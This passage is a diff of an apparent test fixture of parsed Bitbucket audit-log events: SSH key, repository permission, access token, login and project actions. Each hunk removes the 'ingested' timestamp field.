AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\\\r\\\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\\\r\\\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\\\r\\\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\\\r\\\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\\\r\\\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\\\",\\\"label\\\":\\\"schacon@mylaptop.local\\\",\\\"user\\\":{\\\"id\\\":4,\\\"name\\\":\\\"09e096ea84245cc5\\\",\\\"slug\\\":\\\"09e096ea84245cc5\\\"}}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"09e096ea84245cc5\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\"},{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036248,\"nano\":133000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5221,7 +5154,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshaccesskeygranted.repository", - "ingested": "2021-12-24T00:37:41.020821506Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"SSH access key added to repository\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshaccesskeygranted.repository\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"{\\\"id\\\":2,\\\"label\\\":\\\"schacon@mylaptop.local\\\"}\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"key\\\":{\\\"id\\\":2,\\\"label\\\":\\\"schacon@mylaptop.local\\\"},\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"repository\\\":{\\\"id\\\":1,\\\"slug\\\":\\\"test2\\\",\\\"project\\\":{\\\"id\\\":2,\\\"key\\\":\\\"TEST\\\"}}}\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\"},{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshaccesskey.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036248,\"nano\":141000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5312,7 +5244,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissiongrantrequested", - "ingested": "2021-12-24T00:37:41.020822241Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"5\",\"name\":\"access-token-user/2/1\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission requested\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissiongrantrequested\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_ADMIN\\\",\\\"user\\\":\\\"access-token-user/2/1\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036263,\"nano\":970000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5404,7 +5335,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissiongranted", - "ingested": "2021-12-24T00:37:41.020822969Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"5\",\"name\":\"access-token-user/2/1\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_ADMIN\\\",\\\"user\\\":\\\"access-token-user/2/1\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036263,\"nano\":975000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5496,7 +5426,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokencreated.repository", - "ingested": "2021-12-24T00:37:41.020823798Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository access token created\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokencreated.repository\",\"area\":\"SECURITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permissions\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"value\":\"REPO_READ\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"254498386527\\\",\\\"tokenOwner\\\":{\\\"id\\\":5,\\\"name\\\":\\\"access-token-user/2/1\\\",\\\"slug\\\":\\\"access-token-user_2_1\\\"},\\\"name\\\":\\\"ddddd\\\",\\\"permissions\\\":[\\\"REPO_READ\\\"]}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"},{\"name\":\"Name\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"value\":\"ddddd\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036264,\"nano\":6000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5587,7 +5516,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokenmodified.repository", - "ingested": "2021-12-24T00:37:41.020824526Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository access token changed\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokenmodified.repository\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Name\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"value\":\"dddddasdf\"},{\"name\":\"Permissions\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"value\":\"REPO_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"254498386527\\\",\\\"tokenOwner\\\":{\\\"id\\\":5,\\\"name\\\":\\\"access-token-user/2/1\\\",\\\"slug\\\":\\\"access-token-user_2_1\\\"},\\\"name\\\":\\\"dddddasdf\\\",\\\"permissions\\\":[\\\"REPO_ADMIN\\\"]}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036272,\"nano\":296000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5678,7 +5606,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokendeleted.repository", - "ingested": "2021-12-24T00:37:41.020825273Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository access token deleted\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokendeleted.repository\",\"area\":\"SECURITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Name\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"value\":\"dddddasdf\"},{\"name\":\"Permissions\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"value\":\"REPO_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"254498386527\\\",\\\"tokenOwner\\\":{\\\"id\\\":5,\\\"name\\\":\\\"access-token-user/2/1\\\",\\\"slug\\\":\\\"access-token-user_2_1\\\"},\\\"name\\\":\\\"dddddasdf\\\",\\\"permissions\\\":[\\\"REPO_ADMIN\\\"]}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036275,\"nano\":945000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5769,7 +5696,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissionrevocationrequested", - "ingested": "2021-12-24T00:37:41.020826011Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission remove request\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissionrevocationrequested\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"user\\\":\\\"09e096ea84245cc5\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036287,\"nano\":255000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5861,7 +5787,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissionrevoked", - "ingested": "2021-12-24T00:37:41.020826833Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission removed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissionrevoked\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"user\\\":\\\"09e096ea84245cc5\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036287,\"nano\":288000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -5953,7 +5878,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshkeydeleted", - "ingested": "2021-12-24T00:37:41.020827626Z", "original": "{\"affectedObjects\":[{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User deleted SSH access key from profile\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshkeydeleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":2,\\\"public-key\\\":\\\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\\\r\\\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\\\r\\\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\\\r\\\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\\\r\\\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\\\r\\\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\\\",\\\"label\\\":\\\"schacon@mylaptop.local\\\",\\\"user\\\":{\\\"id\\\":4,\\\"name\\\":\\\"09e096ea84245cc5\\\",\\\"slug\\\":\\\"09e096ea84245cc5\\\"}}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"09e096ea84245cc5\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\"},{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036287,\"nano\":298000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -6059,7 +5983,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshaccesskeyrevoked.repository", - "ingested": "2021-12-24T00:37:41.020828364Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"SSH access key deleted from repository\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshaccesskeyrevoked.repository\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"{\\\"id\\\":2,\\\"label\\\":\\\"schacon@mylaptop.local\\\"}\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"key\\\":{\\\"id\\\":2,\\\"label\\\":\\\"schacon@mylaptop.local\\\"},\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"repository\\\":{\\\"id\\\":1,\\\"slug\\\":\\\"test2\\\",\\\"project\\\":{\\\"id\\\":2,\\\"key\\\":\\\"TEST\\\"}}}\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\"},{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshaccesskey.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036287,\"nano\":298000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -6135,7 +6058,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020829108Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036295,\"nano\":112000000},\"version\":\"1.0\"}", "type": [ "access" @@ -6202,7 +6124,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020829855Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036310,\"nano\":261000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", @@ -6281,7 +6202,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020830595Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"200\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:07.312Z - 2021-11-27T18:05:10.261Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"29 - 228\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036310,\"nano\":321000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -6346,7 +6266,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectcreationrequested", - "ingested": "2021-12-24T00:37:41.020831336Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"AT\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project creation requested\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectcreationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036657,\"nano\":308000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -6426,7 +6345,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.projectpermissiongranted", - "ingested": "2021-12-24T00:37:41.020832066Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"},{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Project permission 